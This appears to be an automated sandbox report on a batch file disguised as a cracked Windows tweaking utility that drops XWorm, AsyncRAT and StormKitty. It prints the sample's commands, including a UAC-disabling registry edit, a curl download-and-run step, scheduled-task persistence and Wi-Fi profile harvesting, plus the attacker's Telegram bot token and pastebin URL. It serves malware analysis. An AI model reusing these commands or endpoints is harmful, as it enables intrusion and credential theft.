Analysis
-
max time kernel
148s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
21-07-2024 12:58
Static task
static1
Behavioral task
behavioral1
Sample
EXM_Premium_Tweaking_Utility_1.0_Cracked.bat
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
EXM_Premium_Tweaking_Utility_1.0_Cracked.bat
Resource
win10v2004-20240709-en
General
-
Target
EXM_Premium_Tweaking_Utility_1.0_Cracked.bat
-
Size
672KB
-
MD5
33d64072e513e7945f6585d19a3ba998
-
SHA1
4b790623eb16328d8fb76adf4e32b43cbbaf85f8
-
SHA256
6057667756c5dbd4b66e7d856e1d045d3a05b8592cc689a7eb5a548cd0c1be4e
-
SHA512
761a0499955f2d207ff386282f7e955ab4eb3892039e73e77a92f560ed05ac267e301b55ff80bec108db502fa428154af582b7a6b456f0a9975c42d9ab98e0e5
-
SSDEEP
3072:ZUGzQbmbkAqA2xH7VkKEn14IZVvisLur+K3:ZUGiVNEn14IZVvisL43
Malware Config
Extracted
xworm
-
Install_directory
%LocalAppData%
-
install_file
svchost.exe
-
pastebin_url
https://pastebin.com/raw/ZnhxAV6a
-
telegram
https://api.telegram.org/bot6701075763:AAGkvv2CpqBxGihH8FtOkSA7Uxy35GZpAFI/sendMessage?chat_id=5991331733
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
https://api.telegram.org/bot6701075763:AAGkvv2CpqBxGihH8FtOkSA7Uxy35GZpAFI/sendMessage?chat_id=5991331733
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x00070000000234f3-90.dat family_xworm behavioral2/memory/4800-105-0x0000000000F50000-0x0000000000F6E000-memory.dmp family_xworm -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral2/files/0x00070000000234f4-101.dat family_stormkitty behavioral2/memory/1892-110-0x0000000000320000-0x000000000035E000-memory.dmp family_stormkitty -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x00070000000234f4-101.dat family_asyncrat -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation EXMservice.exe Key value queried \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation svchost.exe -
Executes dropped EXE 4 IoCs
pid Process 2540 EXMservice.exe 4800 svchost.exe 1892 dllhost.exe 3352 svchost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\svchost.exe" svchost.exe -
Drops desktop.ini file(s) 10 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\99901ceb8e52a3139bc759db195b6a2e\Admin@MUEOAWXB_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini dllhost.exe File opened for modification C:\Users\Admin\AppData\Local\99901ceb8e52a3139bc759db195b6a2e\Admin@MUEOAWXB_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini dllhost.exe File opened for modification C:\Users\Admin\AppData\Local\99901ceb8e52a3139bc759db195b6a2e\Admin@MUEOAWXB_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini dllhost.exe File created C:\Users\Admin\AppData\Local\99901ceb8e52a3139bc759db195b6a2e\Admin@MUEOAWXB_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini dllhost.exe File created C:\Users\Admin\AppData\Local\99901ceb8e52a3139bc759db195b6a2e\Admin@MUEOAWXB_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini dllhost.exe File created C:\Users\Admin\AppData\Local\99901ceb8e52a3139bc759db195b6a2e\Admin@MUEOAWXB_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini dllhost.exe File created C:\Users\Admin\AppData\Local\99901ceb8e52a3139bc759db195b6a2e\Admin@MUEOAWXB_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini dllhost.exe File opened for modification C:\Users\Admin\AppData\Local\99901ceb8e52a3139bc759db195b6a2e\Admin@MUEOAWXB_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini dllhost.exe File created C:\Users\Admin\AppData\Local\99901ceb8e52a3139bc759db195b6a2e\Admin@MUEOAWXB_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini dllhost.exe File created C:\Users\Admin\AppData\Local\99901ceb8e52a3139bc759db195b6a2e\Admin@MUEOAWXB_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini dllhost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 72 pastebin.com 71 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 90 icanhazip.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
pid Process 3660 powershell.exe 1396 powershell.exe 4988 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000750203050573ea680000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000750203050000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090075020305000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d75020305000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000007502030500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier dllhost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3716 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 3660 powershell.exe 3660 powershell.exe 1396 powershell.exe 1396 powershell.exe 4988 powershell.exe 4988 powershell.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe 1892 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 60 IoCs
description pid Process Token: SeDebugPrivilege 3660 powershell.exe Token: SeIncreaseQuotaPrivilege 4596 WMIC.exe Token: SeSecurityPrivilege 4596 WMIC.exe Token: SeTakeOwnershipPrivilege 4596 WMIC.exe Token: SeLoadDriverPrivilege 4596 WMIC.exe Token: SeSystemProfilePrivilege 4596 WMIC.exe Token: SeSystemtimePrivilege 4596 WMIC.exe Token: SeProfSingleProcessPrivilege 4596 WMIC.exe Token: SeIncBasePriorityPrivilege 4596 WMIC.exe Token: SeCreatePagefilePrivilege 4596 WMIC.exe Token: SeBackupPrivilege 4596 WMIC.exe Token: SeRestorePrivilege 4596 WMIC.exe Token: SeShutdownPrivilege 4596 WMIC.exe Token: SeDebugPrivilege 4596 WMIC.exe Token: SeSystemEnvironmentPrivilege 4596 WMIC.exe Token: SeRemoteShutdownPrivilege 4596 WMIC.exe Token: SeUndockPrivilege 4596 WMIC.exe Token: SeManageVolumePrivilege 4596 WMIC.exe Token: 33 4596 WMIC.exe Token: 34 4596 WMIC.exe Token: 35 4596 WMIC.exe Token: 36 4596 WMIC.exe Token: SeIncreaseQuotaPrivilege 4596 WMIC.exe Token: SeSecurityPrivilege 4596 WMIC.exe Token: SeTakeOwnershipPrivilege 4596 WMIC.exe Token: SeLoadDriverPrivilege 4596 WMIC.exe Token: SeSystemProfilePrivilege 4596 WMIC.exe Token: SeSystemtimePrivilege 4596 WMIC.exe Token: SeProfSingleProcessPrivilege 4596 WMIC.exe Token: SeIncBasePriorityPrivilege 4596 WMIC.exe Token: SeCreatePagefilePrivilege 4596 WMIC.exe Token: SeBackupPrivilege 4596 WMIC.exe Token: SeRestorePrivilege 4596 WMIC.exe Token: SeShutdownPrivilege 4596 WMIC.exe Token: SeDebugPrivilege 4596 WMIC.exe Token: SeSystemEnvironmentPrivilege 4596 WMIC.exe Token: SeRemoteShutdownPrivilege 4596 WMIC.exe Token: SeUndockPrivilege 4596 WMIC.exe Token: SeManageVolumePrivilege 4596 WMIC.exe Token: 33 4596 WMIC.exe Token: 34 4596 WMIC.exe Token: 35 4596 WMIC.exe Token: 36 4596 WMIC.exe Token: SeDebugPrivilege 1396 powershell.exe Token: SeBackupPrivilege 1600 vssvc.exe Token: SeRestorePrivilege 1600 vssvc.exe Token: SeAuditPrivilege 1600 vssvc.exe Token: SeBackupPrivilege 3924 srtasks.exe Token: SeRestorePrivilege 3924 srtasks.exe Token: SeSecurityPrivilege 3924 srtasks.exe Token: SeTakeOwnershipPrivilege 3924 srtasks.exe Token: SeBackupPrivilege 3924 srtasks.exe Token: SeRestorePrivilege 3924 srtasks.exe Token: SeSecurityPrivilege 3924 srtasks.exe Token: SeTakeOwnershipPrivilege 3924 srtasks.exe Token: SeDebugPrivilege 4988 powershell.exe Token: SeDebugPrivilege 4800 svchost.exe Token: SeDebugPrivilege 1892 dllhost.exe Token: SeDebugPrivilege 4800 svchost.exe Token: SeDebugPrivilege 3352 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4300 wrote to memory of 4716 4300 cmd.exe 86 PID 4300 wrote to memory of 4716 4300 cmd.exe 86 PID 4300 wrote to memory of 3584 4300 cmd.exe 87 PID 4300 wrote to memory of 3584 4300 cmd.exe 87 PID 4300 wrote to memory of 4048 4300 cmd.exe 88 PID 4300 wrote to memory of 4048 4300 cmd.exe 88 PID 4300 wrote to memory of 3660 4300 cmd.exe 89 PID 4300 wrote to memory of 3660 4300 cmd.exe 89 PID 4300 wrote to memory of 1904 4300 cmd.exe 95 PID 4300 wrote to memory of 1904 4300 cmd.exe 95 PID 4300 wrote to memory of 4972 4300 cmd.exe 96 PID 4300 wrote to memory of 4972 4300 cmd.exe 96 PID 4300 wrote to memory of 2004 4300 cmd.exe 97 PID 4300 wrote to memory of 2004 4300 cmd.exe 97 PID 2004 wrote to memory of 4596 2004 cmd.exe 98 PID 2004 wrote to memory of 4596 2004 cmd.exe 98 PID 2004 wrote to memory of 3960 2004 cmd.exe 99 PID 2004 wrote to memory of 3960 2004 cmd.exe 99 PID 4300 wrote to memory of 3304 4300 cmd.exe 100 PID 4300 wrote to memory of 3304 4300 cmd.exe 100 PID 4300 wrote to memory of 5012 4300 cmd.exe 107 PID 4300 wrote to memory of 5012 4300 cmd.exe 107 PID 4300 wrote to memory of 1396 4300 cmd.exe 108 PID 4300 wrote to memory of 1396 4300 cmd.exe 108 PID 4300 wrote to memory of 4120 4300 cmd.exe 118 PID 4300 wrote to memory of 4120 4300 cmd.exe 118 PID 4300 wrote to memory of 3592 4300 cmd.exe 119 PID 4300 wrote to memory of 3592 4300 cmd.exe 119 PID 4300 wrote to memory of 3596 4300 cmd.exe 120 PID 4300 wrote to memory of 3596 4300 cmd.exe 120 PID 4300 wrote to memory of 4988 4300 cmd.exe 122 PID 4300 wrote to memory of 4988 4300 cmd.exe 122 PID 4300 wrote to memory of 2540 4300 cmd.exe 123 PID 4300 wrote to memory of 2540 4300 cmd.exe 123 PID 2540 wrote to memory of 4800 2540 EXMservice.exe 124 PID 2540 wrote to memory of 4800 2540 EXMservice.exe 124 PID 2540 wrote to memory of 1892 2540 EXMservice.exe 125 PID 2540 wrote to memory of 1892 2540 EXMservice.exe 125 PID 2540 wrote to memory of 1892 2540 EXMservice.exe 125 PID 4300 wrote to memory of 4024 4300 cmd.exe 126 PID 4300 wrote to memory of 4024 4300 cmd.exe 126 PID 4800 wrote to memory of 3716 4800 svchost.exe 127 PID 4800 wrote to memory of 3716 4800 svchost.exe 127 PID 1892 wrote to memory of 4436 1892 dllhost.exe 129 PID 1892 wrote to memory of 4436 1892 dllhost.exe 129 PID 1892 wrote to memory of 4436 1892 dllhost.exe 129 PID 4436 wrote to memory of 4420 4436 cmd.exe 131 PID 4436 wrote to memory of 4420 4436 cmd.exe 131 PID 4436 wrote to memory of 4420 4436 cmd.exe 131 PID 4436 wrote to memory of 448 4436 cmd.exe 132 PID 4436 wrote to memory of 448 4436 cmd.exe 132 PID 4436 wrote to memory of 448 4436 cmd.exe 132 PID 4436 wrote to memory of 4676 4436 cmd.exe 133 PID 4436 wrote to memory of 4676 4436 cmd.exe 133 PID 4436 wrote to memory of 4676 4436 cmd.exe 133 PID 1892 wrote to memory of 1916 1892 dllhost.exe 135 PID 1892 wrote to memory of 1916 1892 dllhost.exe 135 PID 1892 wrote to memory of 1916 1892 dllhost.exe 135 PID 1916 wrote to memory of 1652 1916 cmd.exe 137 PID 1916 wrote to memory of 1652 1916 cmd.exe 137 PID 1916 wrote to memory of 1652 1916 cmd.exe 137 PID 1916 wrote to memory of 1952 1916 cmd.exe 138 PID 1916 wrote to memory of 1952 1916 cmd.exe 138 PID 1916 wrote to memory of 1952 1916 cmd.exe 138 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\system32\reg.exeReg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f2⤵PID:4716
-
-
C:\Windows\system32\reg.exeReg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f2⤵PID:3584
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f2⤵PID:4048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3660
-
-
C:\Windows\system32\reg.exeReg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f2⤵
- UAC bypass
PID:1904
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f2⤵PID:4972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"2⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_UserAccount where name="Admin" get sid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4596
-
-
C:\Windows\system32\findstr.exefindstr "S-"3⤵PID:3960
-
-
-
C:\Windows\system32\chcp.comchcp 650012⤵PID:3304
-
-
C:\Windows\system32\chcp.comchcp 4372⤵PID:5012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -Command "Checkpoint-Computer -Description 'Exm Premium Restore Point' -RestorePointType 'MODIFY_SETTINGS'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
-
C:\Windows\system32\chcp.comchcp 650012⤵PID:4120
-
-
C:\Windows\system32\chcp.comchcp 4372⤵PID:3592
-
-
C:\Windows\system32\curl.execurl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"2⤵PID:3596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4988
-
-
C:\exm\EXMservice.exeEXMservice.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Users\Admin\AppData\Local\svchost.exe"C:\Users\Admin\AppData\Local\svchost.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Local\svchost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:3716
-
-
-
C:\Users\Admin\AppData\Local\dllhost.exe"C:\Users\Admin\AppData\Local\dllhost.exe"3⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All4⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵PID:4420
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:448
-
-
C:\Windows\SysWOW64\findstr.exefindstr All5⤵PID:4676
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid4⤵
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵PID:1652
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1952
-
-
-
-
-
C:\Windows\system32\chcp.comchcp 650012⤵PID:4024
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:21⤵
- Suspicious use of AdjustPrivilegeToken
PID:3924
-
C:\Users\Admin\AppData\Local\svchost.exeC:\Users\Admin\AppData\Local\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3352
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5B
MD5ad52498830facdfb560d81b5620b66ae
SHA17123fa003c0a3291b965d0a16f405c73cfbc7477
SHA256b66cc90a512fa6d12f36f42297680c780ff65010015354d5f149a59ecb1c6b0d
SHA512f773fce46a9a8e4d61630ae0a21e7748c943f346e85cccc74a69e21b16b5b0079af0393456030f9d7f680d6009f7fe99f9371297b309073e6b39fdfab79f5be4
-
C:\Users\Admin\AppData\Local\99901ceb8e52a3139bc759db195b6a2e\Admin@MUEOAWXB_en-US\System\Process.txt
Filesize4KB
MD524a32c30c5e04538960049b49ac9f406
SHA11e6294d58493084495635d8c7f91283ea9b71dd7
SHA256fe94c3e8feffde43a2aff2b4af310cb61c557863d95ad73362f13dcead0006b8
SHA512a47cb2c9bc2937f6cebb83d0839440da5c13adac3b263d95174e04956608f7a0cf0a80a7c22a7e95bf7044b4509a972c8d30a93a2ee0a86fafb6d64a43baf01c
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
17.6MB
MD5398dd2d428bb6073e7e370783a827855
SHA1392a4ac9f34a8e5b0d5b360b20aa7ffac1fee68a
SHA256c28c6c53a53b80e84c1d3dc668e332bc4e8e2fb39a1702293358bbfff046a542
SHA5124f6eb16fc7e01813bd559c738c82d628d94d557d3360bbec8fa147478206b10203bb4a5baa7eb85fd16c8fa5d0caa727a07d1ecbc6b69c8012aceca4d975de68
-
Filesize
225KB
MD58008775094d446eaed43a423cd8a26f9
SHA14b8ef16e4a70fed23dc20cc5e27566df1e06af04
SHA25648a06f8dbe0c56894b38bb3489c8ed5243d246328c512ee265bc31de441b5e1f
SHA5126d9f2dca0d9032702971b339b7df65efab1c95d76e89044cf36ed43ef3116d21d1203d1561bd5fb4bd838d4df3dfbd240e2c89b715400f7a89037a3757326792
-
Filesize
101KB
MD5d6ed35edaa98e23f868bfecc878cd41c
SHA1f8c02621df609a4ee7ccdd0c840ba7b2cb5119d8
SHA2565e04cf41691801a80a63e9f479dba3e4deffcaab11505ad0b23ddbcbace3f77d
SHA512d22f5dcb33e07fe342140199356172e9cde0954c0ebe2021678bdeb8e6bee00fbbaa95dbbbea681c8283e73864522cad7b8d1f336b832bce113db6a3fbdd491f
-
Filesize
343KB
MD57b2774daa729996f901ab01b47696ea0
SHA186960c537dabe18846e061ebf1a8762ba441ea53
SHA2565827b18e8c318476278be7e4da2cc165dfd5401122661a8727e275ab1b7ab6e2
SHA5120fc1d640ffa4dd2b2d5af9e54bb90788e5719db954dca86035a5203c52f6f88d56ae22f2e2642472aa599bf989e8fdd07c087749ba60603457d57d006fdecfe6